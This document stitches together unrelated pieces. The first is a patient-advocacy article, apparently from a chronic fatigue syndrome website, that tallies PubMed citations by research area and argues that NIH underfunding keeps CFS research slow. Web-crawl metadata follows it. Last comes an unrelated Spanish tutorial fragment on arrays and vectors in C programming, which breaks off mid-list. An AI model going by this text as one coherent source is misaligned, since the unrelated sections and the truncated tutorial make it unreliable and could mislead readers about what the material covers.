This was due to the publication of the Journal of Chronic Fatigue Syndrome. This publication may have (a) sparked interest in the field and/or (b) provided a venue for theories, studies, etc. not readily accepted in other publications. The trend in PubMed cited articles was flat.) An average of approximately 130 articles that have CFS or myalgic encephalitis in their title have been published every year for the last 10 years (based on 1994, 97, 00, 03, 04).
Trends in CFS research
Total % Clinical % Immune % Psychology % Brain/CNS % Endocrinology % Epidemiology % Cognitive
1988-9
77
36
39
0
0
0
0
0
1991
117
34
31
19
3
1
2
1
1994
132
24
24
14
8
2
4
4
1997
122
21
17
22
7
6
3
7
*2000
130
25
13
12
4
8
2
4
*2003
140
16
24
17
12
8
5
0
*2004
148
28
14
11
15
8
5
3
%Meta-bolism %Oxida-tion %Cardiac %Sleep %OrthostaticIntolerance %Muscles %Others
1988-9
0
2
2
1
0
1
5
1991
4
0
0
0
0
3
3
1994
2
0
2
4
0
2
7
1997
6
0
1
2
3
0
5
*2000
7
3
1
0
4
1
13
*2003
1
5
2
2
4
4
3
*2004
2
3
0
2
3
1
10
*contains citations from the Journal of Chronic Fatigue Syndrome
Trends in research focus
One would expect to see different trends of interest emerge over time in any research area and this has proved true in CFS. The percentage of papers focused on the immune system – the dominant early interest in CFS – declined from a high of 45% of citations in 1988-89 to about 17% of citations in 2000/03 and 04.
Within the immune category research trends have changed as well; research into viruses, while still a significant topic, has declined markedly since 1991 (1991 – 20 citations; 2003/4 – 5 citations) as interest in bacteria (mycoplasma, chlamydiae, staphylococcus) has picked up (1991/1993 – 0 studies; 2003/2004 – 10 studies).
Another area of diminishing interest have been the clinical aspects of CFS. The clinical category primarily contains doctor to doctor talk; it centers on the diagnosis, treatment, management and prognosis of CFS as well as reviews of CFS and discussions regarding CFS’s validity (controversy). Still one of the most cited subjects (@20-25%) it makes up substantially smaller portion of the total citations than it used to (30—35%).
Interest in the psychological aspects of CFS has also changed dramatically over time. While no interest was seen early on (0 citations 1988/9 – 0) psychology in CFS rapidly assumed a major focus (1991 – 22). Psychology studies reached a peak in 2001 but have fluctuated dramatically and may have even declined since then.
The two years with the lowest number of psychologically oriented studies were 2000 (16) and 2004 (11). Within the field the focus of interest has changed dramatically. In the early 1990’s depression was a major topic but has been replaced since about 1997 by cognitive behavior therapy (CBT) was a major research interest.
CBT et. al. accounted for from 25% to 60% of psychology citations in 1997, 2000, 2003, 2004. Aside from these two topics, there appears to be little coherence in this field; research topic range from psychiatric morbidity to the effects of birth order to the radicalization of the self, to parenting, etc.
While interest in the immunological and clinical aspects of CFS appears to have declined, interest in three fields; the brain/CNS, endocrinology and oxidation/metabolism has increased sharply in the last 4 to 7 years. Interest in the brain/CNS has, not surprisingly given the cognitive difficulties associated with CFS, always garnered some interest but in the last two years that interest has jumped markedly with 12 and 14% of all citations devoted to it. Two subtopics, in particular – serotonin and cholinergic function – have gained in popularity lately.
The endocrine system attracted little interest early on. No citations concerning the endocrine system occurred in 1988/91 and only 2 in 1991 and 1994. Since 2000, however, over ten papers have been published on endocrinological topics every year with a dominant focus on cortisol.
Since its discovery in CFS in 1995 by Rowe, orthostatic intolerance has remained a relatively small but nevertheless consistent source of citations. Similarly, while not being a major source of citations, free radicals and the oxidation/antioxidant balance (@4) arrived as a research interest in CFS in the last four years.
It is difficult to discern any trends in muscle activity, metabolic processes or sleep. Interest in each has been present since the early days of CFS research but none has become a major research topic and interest in each has fluctuated greatly. Driven primarily by one research group, interest in cardiology has been consistent but low.
Interestingly alternative health therapies, long a treatment mainstay for CFS patients, were a major source of citations for the first time in 2004 with 8 citations devoted to them. In the past five years genetics has arrived on the scene with several citations devoted to it in 2000, 2003 and 2004.
The implications for CFS patients
What do these numbers mean for CFS patients? Can they be confident that the medical research community has marshalled it’s considerable resources on their behalf? Even if the numerical trends are flat or only mildly positive one would think 130 or so ‘papers’ a year would be sufficient to guarantee real progress.
It sounds, after all, like a lot of work is being done – enough one would think to give CFS patients hope that before too many more years pass, significant breakthroughs in the understanding of and treatment of their disease will occur. A closer look at the ‘research’ cited in PubMed indicates this is anything but true. Few of the citations for CFS signify papers that have the potential to make a difference in the understanding of CFS.
A mixed bag
The papers cited by PubMed vary widely in focus and quality. PubMed citations include everything from letters to reviews, from small one page studies to complex, multi-dimensional studies, from one person treatment ‘trials’ to double- blinded, placebo controlled, multi-group treatment trials.
In PubMed papers on CFS in animals and birth order sit next to large, multi-year studies on prevalence in humans, e.g. a citation in PubMed is not necessarily indicative of a significant contribution to CFS.
What a person suffering from CFS really desires is a breakthrough in our understanding or treatment of CFS. In lieu of that they want to know that significant work is being undertaken to understand CFS. They want to feel that the depth of the research effort into CFS is somehow congruent with the pain caused by CFS; that something that can so overwhelmingly alter their lives is being dealt with seriously by the medical research community.
They want to have an idea that significant progress will occur in CFS before the productive period of their lives is over. The next part of this paper, which examines whether this appears likely to occur, determines how many of the 3000 or so papers PubMed cites have the potential to significantly advance our understanding of CFS.
In order to do that distinctions are made between three categories of papers; insignificant, important but not difference making and potentially difference making papers.
Unimportant vs important papers
A certain number of papers cited by PubMed every year have little change of making an important contribution. Chief among these are papers published in a foreign language. These papers are often not abstracted and are probably little read. These papers can be surprisingly abundant; in 2004 they made up about 6% of all PubMed citations on CFS.
Important vs potentially difference-making papers
Some papers are important to the overall understanding and treatment of CFS but have no potential to advance our understanding of the biological processes occurring in CFS. They mostly involve medical professionals talking to medical professionals about peripheral issues common to any disease; i.e. how to characterize, diagnose or treat it, how common it is, what issues its patients face. They mainly occur in the following categories.
Clinical (@20-25%) – A substantial number of papers every year focus on the clinical aspects of CFS (diagnosis, management, prognosis, controversy).
Psychological (@17%) – It is clear, at least to CFS patients, that psychological studies will have little effect on the ultimate resolution of this disease. At their best they may help CFS patients cope with rigors of CFS. At their worst they divert attention and funding from more fundamental aspects of CFS and alienate CFS patients.
Epidemiological (@5%) – Epidemiological papers are vitally important for assessing the prevalence and economic costs of CFS and providing a rationale for more funding. Given the abysmal levels of current funding these papers may, in fact, be the most important papers published. Nevertheless they do not contribute to our understanding of the biological processes operating in CFS.
Neuropsychological/cognitive – (@ 4%) These papers elucidate the problems in cognitive functioning found in CFS patients. As such they provide evidence of brain dysfunction in CFS that is important for disability claims and for promoting more interest in the CFS. They do not, however, advance our knowledge of CFS pathophysiology.
According to this survey about half of the papers PubMed cites every year deal do not have the potential to further our understanding of the biological processes occurring in CFS.
This leaves us with about 70 articles published a year that might make a more less immediate difference in understanding the cause, mapping out its dysfunctions or uncovering a treatment for CFS. Even that sounds like a good number – 70 papers a year should surely offer real hope for CFS patients. Even this number is misleadingly high, however.
Potentially Difference Making Papers – Two general categories of potentially difference making papers can be formed; theoretical papers and studies. While purely theoretical papers have the ability to make a difference in CFS by elucidating creative new approaches to CFS, their impact is always impossible to ascertain at the time of publication. Their impact is further obscured by the fact that many, probably most theoretical papers receive either no or inadequate follow up. Ultimately, the only papers able to have animmediate and significant impact on CFS patients are ones examining the biological processes (the pathophysiology) present in CFS. In a very real way they are the papers that really matter.
Surprisingly, though, given their fundamental importance, studies addressing CFS pathophysiology are not common. Many more papers are published every year on essentially peripheral subjects such as clinical reviews, psychological studies, etc. In 2004 PubMed listed only 35 studies (not including treatment trials) that actually examined examined an aspect of CFS pathophysiology. Thus of all the citations that PubMed pulls for CFS only about 15% of them are engaged in uncovering the cause of CFS.
Even within this category there are subcategories and gradations of value. About 30% of all studies of CFS pathophysiology in 2004 simply undertook to confirm or deny prior findings (apoptosis, Th1/Th2 cytokine imbalance, ACTH/cortisol, salivary cortisol, serum erythropoietin). These studies are an important part of the march of science but they are not difference making because they do not forward the science, i.e. they do not bring our understanding of CFS to a deeper level.
A significant number of studies every year are exploratory studies that seek to determine if X occurs in CFS or not (gene expression, brain imaging, EBV, borna virus antibodies, urinary electrophoretic profiles). Is there brain damage in CFS? Is gene expression different? Is X virus present in CFS? Are abnormal levels of sympathetic nervous system activity present in CFS? These studies advance our understanding of CFS but their significance is unclear as well. They open up new avenues for research that may or may not pay off in the future.
The really difference making studies, the ones that might send a jolt of excitement up a patients or researchers spine, are those that have identified an abnormality and are working their way down a chain of causation to its source nd thus to CFS. Only a few papers in 2004, however, actually extended our knowledge of the causal factors of CFS. The corticosteroid gene polymorphism study, for instance, posits a cause for the low cortisol levels present in some CFS patients. The skin vasodilation study examined potential causes of skin vasodilation and by extension orthostatic intolerance.
One reason these papers are so few and much of the emphasis in CFS research is still on exploratory studies is that only a few abnormalities have been consistently found in CFS. Several factors contribute to this including poor funding, different diagnostic criteria over time, the lack of standardization, the occurrence of subsets in CFS, and the waxing and waning nature of the disease.
The lack of standardization is puzzling given the sophistication of the medical research establishment but is a very real problem. Two recent overviews of immune and neuroendocrine research in CFS cited the lack of standardization and poor study methodology as reasons for the conflicting results sometimes seen in CFS research studies. Nancy Klimas was able to explain away several inconsistencies concerning cytokine studies simply by noting the different laboratory techniques used. This problem has been frequently noted by the NIH yet it has taken no steps to address it.
Funding woes
The greatest problem facing CFS research, however, is inadequate funding. This is a disease, after all, that can affect the immune, cardiovascular, endocrine and nervous systems.. In how many diseases are brain scans and spinal taps as well as hormonal, immune, orthostatic, metabolic, sleep and exercise tests part of the research protocol? In how many diseases do psychological studies take up a significant amount of research funds?
Despite its needs CFS remains one of the most poorly funded diseases in the United States. Despite productivity losses to the US economy from disabled CFS patients totaling some $9,000,000,000 a year, the National Institutes of Health (NIH) saw fit last year to fund CFS research to the tune of only $6,000,000. Of the 175 research areas funded by the NIH in 2004 CFS was 170th in funds awarded.
The NIH gave temporal mandibular joint (TMJ) researchers 3’xs as much money as CFS; Lyme’s disease was given 5 x’s the money CFS was; Crohn’s disease 9 x’s, anthrax research 17 x’s. asthma 50 x’s and AIDS 500 x’s as much money. Just theincrease in asthma funding over the past two years – the increase! – was five times the total funding given CFS last year. This does not take into account the fact that a significant proportion of the funds the NIH says were devoted to ‘CFS research’ did not investigate CFS pathophysiology.
It is clear there is simply too little money and too many areas of interest for research in any one area to move ahead rapidly in CFS. Research into serotonin activity in CFS provides a case study of how slowly even a ‘major research effort’ proceeds in CFS.
Serotonin: A Case Study: Bakheit et. al. first uncovered evidence of increased serotonergic HPA axis activity in response to busiprone in CFS patients in 1992. In the same year Demitrack et. al. found evidence of increased serotonin activity in the spinal fluid. Since 1992 seven studies (about one every other year) have assessed serotonergic levels or activity in the spinal fluid, hypothalamus and brain in CFS using different serotonin agonists and different techniques (PET scan, CSF levels, provocation). Some heterogeneous findings have been found but for the most part studies have indicated increased serotonin activity in CFS.
Thirteen years after serotonin levels were first seen to be abnormal in CFS researchers now appear to beapproaching a consensus that serotonergic activity is increased in CFS. That is a long time in the life of a CFS patient. It is about third of ones productive years. It is a very long time to wait for researchers to reach an agreement about the importance of one substance – and researchers are still not there yet. That consensus may still be several years and several studies away.
What is most unsettling about this situation is that serotonin is not an obscure compound. One of the major neurotransmitters in the body, serotonin is involved in gastric secretion, and smooth muscle (vascular) and central nervous system activity.
A whole class of drugs, selective serotonin reuptake inhibitors (SSRI’s) has been developed to battle depression and other mood disorders. Because serotonin has the potential to effect so many different systems, one would think serotonin activity in CFS would have been assessed extensively once studies indicating a possible upregulation was present.
Instead the ‘serotonin question’ has been attacked in a piecemeal fashion by researchers using different protocols. Remember we have hardly even begun to assess the cause of a possible serotonergic up regulation in CFS; it has taken over a decade just to arrive at a consensus that it probably exists.
The same story plays out regarding cortisol, the most important adrenal hormone. Thirteen years after low cortisol levels were first noted cortisol levels are still being assessed in CFS. While heterogeneous cortisol findings do complicate matters to some degree, this slow progress cannot simply be laid at the feet of a wildly heterogeneous patient population.
Instead it is largely a function of a poorly funded and poorly organized research community. When researchers take a decade or more to assess the levels of one major substance in the body, can CFS patients any confidence that the resolution of their disease is anywhere in sight?
CFS is a complex disease. Understanding it will undoubtedly require venturing out into new ground and piecing together findings in novel ways. A new disease process will most likely need to be explicated. Cortisol and serotonin, however, hardly constitute ‘new ground’.
If it takes so long to simply assess the levels of these substances, how long will it take to investigate the lesser known or still unknown substances or processes that most likely lie at the heart of CFS? If the research community is this poor at assessing the ‘easy’ stuff how in the world will it be able to muster the ability to tackle the more problematic stuff?
Innovation quenched
Benjamin Natelson’s recent travails concerning finding funding for a spinal fluid gene/protein expression study are illustrative of the funding travails that confront CFS researchers. Dr. Natelson has been the most prolific CFS researcher in the world over the past five years and gene and protein expression studies are arguably the two most potentially helpful research field concerning CFS.
They have the potential to fundamentally alter our understanding of CFS. Despite Dr. Natelson’s reputation and the NIH’s recognition of the urgent need to break new ground in this disease it has refused to even partially fund his gene/protein expression CSF study.
This was notwithstanding the fact that Dr. Natelson recently co-authored a study finding abnormal cytokine levels in the spinal fluid of CFS patients, or the fact that he already has the spinal fluid. Perhaps not surprisingly a year after Dr. Natelson was denied funding a proteomics study by another researcher found a potential protein biomarker in the CSF of CFS patients.
One is tempted to ask if this eminent researcher cannot get funding for such a worthwhile project then what chance do lesser known researchers CFS have? The history of CFS research is littered with promising studies that had positive outcomes but received little or no follow up (hypercoagulation, PKR, adenosine levels, G-actin, etc.).
Innovative theories regarding CFS pathophysiology are regularly advanced but are rarely adequately tested. Despite demonstrating tie-ins with several other theories of CFS and being the topic of much discussion, Pall’s nitric oxide/peroxynitrite theory has been the object of only one small study in six years.
This petty pace
The 3000 papers so often cited with regards to CFS research is misleading as only a small portion of those papers actually involve research efforts. Even the small amount of research done on CFS might be sufficient if we had a clear focus on CFS pathophysiology – if we knew what part of the body to zero in on, but we don’t. Research into CFS is spread all over the body. This means, given the small amount of research funding CFS receives, our progress in understanding this disease is doomed to be achingly slow.
The funding is simply not available for research teams to target an area and quickly and exhaustively investigate it. An examination of the CFS research ‘groups’ of the past five years indicates that most are very small groups that are able to produce a study once every year and a half or so.
These groups, always subject to a tenuous funding environment, manage to slowly chip away at their subject of interest over time but given their resources the amount of progress they can make is limited. Stewart, for instance, lists 16 different possible causes of the microcirculatory difficulties found in a subset (low-flow POTS) of a subset of CFS patients.
Similarly Spence and Khan list 9+ items that could be affecting acetylcholinesterase activity in CFS. Given the current pace of CFS research it can take many years for a consensus to form around any positive findings. A research effort that could take a year or two in a well funded disease can easily take ten years or more in CFS.
By under funding CFS research the powers that be have essentially decreed it will move forward at a petty pace. They have decided there are more important things for them to focus on. While researchers scramble for funding CFS patients watch the decades and their lives and dreams dribble away.
Shakespeare’s description of the human condition in Macbeth never resonated more strongly than it does with both CFS researchers and patients who seem, at times, relegated to irrelevance while the great public research institutions entrusted with the nation’s health look away.
“To-morrow, and to-morrow, and to-morrow,
Creeps in this petty pace from day to day,
To the last syllable of recorded time…
Life’s but a walking shadow; a poor player…”
——————————————————————
*The first two papers on CFS in the eighties were
Buchwald D, Sullivan JL, Komaroff AL..Frequency of ‘chronic active Epstein-Barr virus infection’ in a general medical practice. JAMA. 1987 May 1;257(17):2303-
Caligiuri M, Murray C, Buchwald D, Levine H, Cheney P, Peterson D, Komaroff AL, Ritz J. Phenotypic and functional deficiency of natural killer cells in patients with chronic fatigue syndrome. J Immunol. 1987 Nov 15;139 (10):3306-13.
It’s amazing how quickly what would become an important cadre of researchers and physicians congealed around CFS. Of the authors of the first two papers on CFS Buchwald has co-authored 69 papers on CFS, Komaroff 63, Levine 32 and Peterson 30. Dr. Cheney became one of the most creative CFS clinicians. CFS was not only a defining moment for their patients; it changed the lives of many of the earliest physicians on the scene as well. Several have dedicated their careers to understanding and treating CFS.
Donate to Phoenix Rising – help keep the lights on!
|
{
"url": "http://phoenixrising.me/research-2/trends-in-chronic-fatigue-syndrome-research/comment-page-1",
"source_domain": "phoenixrising.me",
"snapshot_id": "crawl=CC-MAIN-2016-18",
"warc_metadata": {
"Content-Length": "84793",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:67B6FARMWU6H62TQYGKJMMMC5MU2T5IL",
"WARC-Concurrent-To": "<urn:uuid:187774cd-7168-4f37-b3a4-9ba3503280b8>",
"WARC-Date": "2016-05-04T15:28:34Z",
"WARC-IP-Address": "104.200.19.10",
"WARC-Identified-Payload-Type": null,
"WARC-Payload-Digest": "sha1:LBPOFE42CBCGJVA2HQTNXQNQFPEI5VPB",
"WARC-Record-ID": "<urn:uuid:aedc3c13-c6cd-4b04-8208-0c4c1a219e53>",
"WARC-Target-URI": "http://phoenixrising.me/research-2/trends-in-chronic-fatigue-syndrome-research/comment-page-1",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:b8d9c361-cf15-4666-aac4-a39f9ecfc73b>"
},
"warc_info": "robots: classic\r\nhostname: ip-10-239-7-51.ec2.internal\r\nsoftware: Nutch 1.6 (CC)/CC WarcExport 1.0\r\nisPartOf: CC-MAIN-2016-18\r\noperator: CommonCrawl Admin\r\ndescription: Wide crawl of the web for April 2016\r\npublisher: CommonCrawl\r\nformat: WARC File Format 1.0\r\nconformsTo: http://bibnum.bnf.fr/WARC/WARC_ISO_28500_version1_latestdraft.pdf"
}
|
{
"line_start_idx": [
0,
7,
8,
52,
53,
196,
197,
208,
209,
536,
537,
837,
838,
1106,
1107,
1455,
1456,
1770,
1771,
2197,
2198,
2209,
2210,
2554,
2555,
2955,
2956,
3346,
3347,
3477,
3478,
3487,
3488,
3895,
3896,
4358,
4359,
4382,
4383,
4477,
4484,
4485,
4488,
4489,
4492,
4493,
4496,
4497,
4499,
4500,
4502,
4503,
4505,
4506,
4508,
4509,
4511,
4512,
4517,
4518,
4522,
4523,
4526,
4527,
4530,
4531,
4534,
4535,
4537,
4538,
4540,
4541,
4543,
4544,
4546,
4547,
4552,
4553,
4557,
4558,
4561,
4562,
4565,
4566,
4569,
4570,
4572,
4573,
4575,
4576,
4578,
4579,
4581,
4582,
4587,
4588,
4592,
4593,
4596,
4597,
4600,
4601,
4604,
4605,
4607,
4608,
4610,
4611,
4613,
4614,
4616,
4617,
4623,
4624,
4628,
4629,
4632,
4633,
4636,
4637,
4640,
4641,
4643,
4644,
4646,
4647,
4649,
4650,
4652,
4653,
4659,
4660,
4664,
4665,
4668,
4669,
4672,
4673,
4676,
4677,
4680,
4681,
4683,
4684,
4686,
4687,
4689,
4690,
4696,
4697,
4701,
4702,
4705,
4706,
4709,
4710,
4713,
4714,
4717,
4718,
4720,
4721,
4723,
4724,
4726,
4727,
4729,
4730,
4812,
4819,
4820,
4822,
4823,
4825,
4826,
4828,
4829,
4831,
4832,
4834,
4835,
4837,
4838,
4840,
4841,
4846,
4847,
4849,
4850,
4852,
4853,
4855,
4856,
4858,
4859,
4861,
4862,
4864,
4865,
4867,
4868,
4873,
4874,
4876,
4877,
4879,
4880,
4882,
4883,
4885,
4886,
4888,
4889,
4891,
4892,
4894,
4895,
4900,
4901,
4903,
4904,
4906,
4907,
4909,
4910,
4912,
4913,
4915,
4916,
4918,
4919,
4921,
4922,
4928,
4929,
4931,
4932,
4934,
4935,
4937,
4938,
4940,
4941,
4943,
4944,
4946,
4947,
4950,
4951,
4957,
4958,
4960,
4961,
4963,
4964,
4966,
4967,
4969,
4970,
4972,
4973,
4975,
4976,
4978,
4979,
4985,
4986,
4988,
4989,
4991,
4992,
4994,
4995,
4997,
4998,
5000,
5001,
5003,
5004,
5007,
5008,
5073,
5074,
5099,
5100,
5415,
5416,
5742,
5743,
6176,
6177,
6499,
6500,
6823,
6824,
7131,
7132,
7692,
7693,
7974,
7975,
8299,
8300,
8639,
8640,
8940,
8941,
8975,
8976,
9293,
9294,
9735,
9736,
9748,
9749,
10043,
10044,
10252,
10253,
10696,
10697,
11030,
11031,
11202,
11203,
11235,
11236,
11581,
11582,
11632,
11633,
12072,
12073,
12222,
12223,
12559,
12560,
12942,
12943,
13275,
13276,
13456,
13457,
13804,
13805,
14519,
14520,
15021,
15022,
15504,
15505,
16051,
16052,
16646,
16647,
17037,
17038,
17616,
17617,
17630,
17631,
18068,
18069,
18466,
18467,
18996,
18997,
19256,
19257,
19894,
19895,
20383,
20384,
20633,
20634,
20986,
20987,
21289,
21290,
21653,
21654,
21934,
21935,
22205,
22206,
22574,
22575,
22595,
22596,
22990,
22991,
23257,
23258,
23634,
23635,
23973,
23974,
24285,
24286,
24302,
24303,
24820,
24821,
25115,
25116,
25478,
25479,
25812,
25813,
26108,
26109,
26387,
26388,
26430,
26473,
26512,
26557,
26558,
26581,
26582,
26632,
26633,
26792,
26793,
27026,
27027,
27534,
27535
],
"line_end_idx": [
7,
8,
52,
53,
196,
197,
208,
209,
536,
537,
837,
838,
1106,
1107,
1455,
1456,
1770,
1771,
2197,
2198,
2209,
2210,
2554,
2555,
2955,
2956,
3346,
3347,
3477,
3478,
3487,
3488,
3895,
3896,
4358,
4359,
4382,
4383,
4477,
4484,
4485,
4488,
4489,
4492,
4493,
4496,
4497,
4499,
4500,
4502,
4503,
4505,
4506,
4508,
4509,
4511,
4512,
4517,
4518,
4522,
4523,
4526,
4527,
4530,
4531,
4534,
4535,
4537,
4538,
4540,
4541,
4543,
4544,
4546,
4547,
4552,
4553,
4557,
4558,
4561,
4562,
4565,
4566,
4569,
4570,
4572,
4573,
4575,
4576,
4578,
4579,
4581,
4582,
4587,
4588,
4592,
4593,
4596,
4597,
4600,
4601,
4604,
4605,
4607,
4608,
4610,
4611,
4613,
4614,
4616,
4617,
4623,
4624,
4628,
4629,
4632,
4633,
4636,
4637,
4640,
4641,
4643,
4644,
4646,
4647,
4649,
4650,
4652,
4653,
4659,
4660,
4664,
4665,
4668,
4669,
4672,
4673,
4676,
4677,
4680,
4681,
4683,
4684,
4686,
4687,
4689,
4690,
4696,
4697,
4701,
4702,
4705,
4706,
4709,
4710,
4713,
4714,
4717,
4718,
4720,
4721,
4723,
4724,
4726,
4727,
4729,
4730,
4812,
4819,
4820,
4822,
4823,
4825,
4826,
4828,
4829,
4831,
4832,
4834,
4835,
4837,
4838,
4840,
4841,
4846,
4847,
4849,
4850,
4852,
4853,
4855,
4856,
4858,
4859,
4861,
4862,
4864,
4865,
4867,
4868,
4873,
4874,
4876,
4877,
4879,
4880,
4882,
4883,
4885,
4886,
4888,
4889,
4891,
4892,
4894,
4895,
4900,
4901,
4903,
4904,
4906,
4907,
4909,
4910,
4912,
4913,
4915,
4916,
4918,
4919,
4921,
4922,
4928,
4929,
4931,
4932,
4934,
4935,
4937,
4938,
4940,
4941,
4943,
4944,
4946,
4947,
4950,
4951,
4957,
4958,
4960,
4961,
4963,
4964,
4966,
4967,
4969,
4970,
4972,
4973,
4975,
4976,
4978,
4979,
4985,
4986,
4988,
4989,
4991,
4992,
4994,
4995,
4997,
4998,
5000,
5001,
5003,
5004,
5007,
5008,
5073,
5074,
5099,
5100,
5415,
5416,
5742,
5743,
6176,
6177,
6499,
6500,
6823,
6824,
7131,
7132,
7692,
7693,
7974,
7975,
8299,
8300,
8639,
8640,
8940,
8941,
8975,
8976,
9293,
9294,
9735,
9736,
9748,
9749,
10043,
10044,
10252,
10253,
10696,
10697,
11030,
11031,
11202,
11203,
11235,
11236,
11581,
11582,
11632,
11633,
12072,
12073,
12222,
12223,
12559,
12560,
12942,
12943,
13275,
13276,
13456,
13457,
13804,
13805,
14519,
14520,
15021,
15022,
15504,
15505,
16051,
16052,
16646,
16647,
17037,
17038,
17616,
17617,
17630,
17631,
18068,
18069,
18466,
18467,
18996,
18997,
19256,
19257,
19894,
19895,
20383,
20384,
20633,
20634,
20986,
20987,
21289,
21290,
21653,
21654,
21934,
21935,
22205,
22206,
22574,
22575,
22595,
22596,
22990,
22991,
23257,
23258,
23634,
23635,
23973,
23974,
24285,
24286,
24302,
24303,
24820,
24821,
25115,
25116,
25478,
25479,
25812,
25813,
26108,
26109,
26387,
26388,
26430,
26473,
26512,
26557,
26558,
26581,
26582,
26632,
26633,
26792,
26793,
27026,
27027,
27534,
27535,
27586
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 27586,
"ccnet_original_nlines": 427,
"rps_doc_curly_bracket": 0,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.3940849006175995,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.03840982913970947,
"rps_doc_frac_lines_end_with_ellipsis": 0.002336449921131134,
"rps_doc_frac_no_alph_words": 0.17687727510929108,
"rps_doc_frac_unique_words": 0.27434414625167847,
"rps_doc_mean_word_length": 4.9459757804870605,
"rps_doc_num_sentences": 226,
"rps_doc_symbol_to_word_ratio": 0.00038410001434385777,
"rps_doc_unigram_entropy": 5.9714274406433105,
"rps_doc_word_count": 4498,
"rps_doc_frac_chars_dupe_10grams": 0,
"rps_doc_frac_chars_dupe_5grams": 0.028138630092144012,
"rps_doc_frac_chars_dupe_6grams": 0.013215259648859501,
"rps_doc_frac_chars_dupe_7grams": 0.00485459016636014,
"rps_doc_frac_chars_dupe_8grams": 0.00485459016636014,
"rps_doc_frac_chars_dupe_9grams": 0.00485459016636014,
"rps_doc_frac_chars_top_2gram": 0.008315729908645153,
"rps_doc_frac_chars_top_3gram": 0.006472779903560877,
"rps_doc_frac_chars_top_4gram": 0.004719739779829979,
"rps_doc_books_importance": -2145.7021484375,
"rps_doc_books_importance_length_correction": -2145.7021484375,
"rps_doc_openwebtext_importance": -1112.302978515625,
"rps_doc_openwebtext_importance_length_correction": -1112.302978515625,
"rps_doc_wikipedia_importance": -493.19635009765625,
"rps_doc_wikipedia_importance_length_correction": -493.19635009765625
},
"fasttext": {
"dclm": 0.04299699887633324,
"english": 0.9438053369522095,
"fineweb_edu_approx": 2.7270443439483643,
"eai_general_math": 0.39773833751678467,
"eai_open_web_math": 0.25579899549484253,
"eai_web_code": 0.029903890565037727
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "616.858",
"labels": {
"level_1": "Industrial arts, Technology, and Engineering",
"level_2": "Medicine",
"level_3": "Pathology and Diseases"
}
},
"secondary": {
"code": "616.075",
"labels": {
"level_1": "Industrial arts, Technology, and Engineering",
"level_2": "Medicine",
"level_3": "Pathology and Diseases"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "4",
"label": "Analyze"
},
"secondary": {
"code": "5",
"label": "Evaluate"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "2",
"label": "Conceptual"
},
"secondary": {
"code": "3",
"label": "Procedural"
}
},
"document_type_v1": {
"primary": {
"code": "2",
"label": "Academic/Research"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"extraction_artifacts": {
"primary": {
"code": "3",
"label": "Irrelevant Content"
},
"secondary": {
"code": "0",
"label": "No Artifacts"
}
},
"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"document_type_v2": {
"primary": {
"code": "3",
"label": "Academic Writing"
},
"secondary": {
"code": "10",
"label": "Knowledge Article"
}
},
"reasoning_depth": {
"primary": {
"code": "3",
"label": "Intermediate Reasoning"
},
"secondary": {
"code": "4",
"label": "Advanced Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "3",
"label": "Mostly Correct"
},
"secondary": {
"code": "4",
"label": "Highly Correct"
}
},
"education_level": {
"primary": {
"code": "3",
"label": "Undergraduate Level"
},
"secondary": {
"code": "4",
"label": "Graduate/Expert Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
-8,777,318,122,611,588,000
|
Programación en C
Lenguajes de Programación. Organización lógica datos. Algoritmos. Subalgoritmos. Estructuras dinámicas lineales de datos
• Enviado por: Glistig
• Idioma: castellano
• País: España España
• 25 páginas
publicidad
ORGANIZACIÓN LÓGICA DE DATOS. ESTRUCTURAS ESTATICAS
A. INTRODUCCION
Las estructuras estáticas son conjuntos de datos homogéneos que se trata como una sola unidad. Hay dos tipos de estructuras: internas y externas (en soportes físicos).
Internas: se almacenan en la memoria principal del ordenador, que es la memoria RAM.
Array o tabla o matriz: se utilizan en cualquier lenguaje de programación para almacenar datos que son del mismo tipo o demás.
B. Conceptos y definiciones
1. Tabla o array: consiste en un (conjunto) numero fijo y ordenado de elementos, todos del mismo tipo y bajo un mismo nombre.
2. Componentes: son los elementos que forman el array.
3. Índices: la posición de cada componente dentro del array viene determinado por el índice o índices (uno o varios).
4. Dimensiones: de una tabla o array es el número de índices que se utiliza.
5. Longitud: es el tamaño de la tabla o array, el número de elementos que contiene el array.
6. Tipo de array: el tipo de sus componentes.
Todos los componentes de un array los vamos a utilizar como variables y se va a poder realizar operaciones con los arrays.
Representación grafica de un array:
Alumnos
Array
Jose
Rosa
Luis
Lola
Andres
Maria
Nombre del array: Alumnos.
Componentes: Alumnos(1), Alumnos(2), ......... , Alumnos(7).
Índices: 1
Dimensión:1
Longitud: 7
Tipo de array: Alfanumérico.
C. TIPOS DE ARRAYS
• Unidimensionales
• Bidimensionales
• Multidimensionales
• 1. Unidimensionales: van a tener una sola dirección y por lo tanto un solo índice. Se les llama a este tipo de arrays Vectores.
Si queremos intercambiar el contenido entre dos vectores, vamos a declarar primero una variable auxiliar.
AUX=Alumnos(1)
Alumnos(1)=Alumnos(2)
Alumnos(2)=AUX
SWITCH
Es un campo de memoria que puede tomar dos valores exclusivos (uno u otro) y se utiliza para lo siguiente:
- Recordar en un determinado punto de un programa la ocurrencia o no de un suceso anterior.
- Salir de un bucle.
- Para decidir en una instrucción alternativa que acción realizar.
- Para hacer que dos acciones diferentes se ejecuten alternativamente dentro de un bucle.
a) OPERACIONES CON VECTORES: asignación, lectura/escritura, recorrido y actualización.
• Asignación: es dar un valor a algún elemento del vector. Los vectores son sucesiones ordenadas de elementos. Cuando veamos x[1], x[2], .... , x[n] sabremos que es un vector. En los vectores no es obligatorio empezar desde 1, pueden empezar desde 0, un número negativo o un número positivo distinto de 1.
Tipo
Array[dimensión]tipo de datos: nombre del array
Var
Nombre del array: N (variable que se va a utilizar para cada elemento del array).
• Lectura y escritura:
Leer (A): leer el array entero.
